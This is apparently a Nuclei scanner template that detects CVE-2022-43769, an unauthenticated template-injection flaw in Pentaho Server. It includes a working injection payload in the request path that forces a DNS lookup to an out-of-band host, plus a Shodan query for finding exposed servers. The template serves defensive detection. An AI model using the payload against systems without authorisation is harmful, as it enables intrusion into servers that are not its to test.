44 lines
1.6 KiB
YAML
44 lines
1.6 KiB
YAML
id: CVE-2022-43769
|
|
|
|
info:
|
|
name: Pentaho Server 9.3.0.0-324 - Unauthenticated RCE via SSTI
|
|
author: dwbzn
|
|
severity: critical
|
|
description: |
|
|
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x allow certain web services to set property values which contain Spring templates that are interpreted downstream.
|
|
reference:
|
|
- https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769-
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-43769
|
|
remediation: Upgrade to the latest Hitachi Vantara Pentaho version 9.4 release with Service Pack 9.4.0.1. For version 9.3 recommend updating to Service Packs 9.3.0.2
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.0
|
|
cve-id: CVE-2022-43769
|
|
cwe-id: CWE-77
|
|
metadata:
|
|
verified: "true"
|
|
shodan-query: http.favicon.hash:1749354953
|
|
tags: cve,cve2022,rce,ssti,pentaho,kev
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
words:
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "false"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|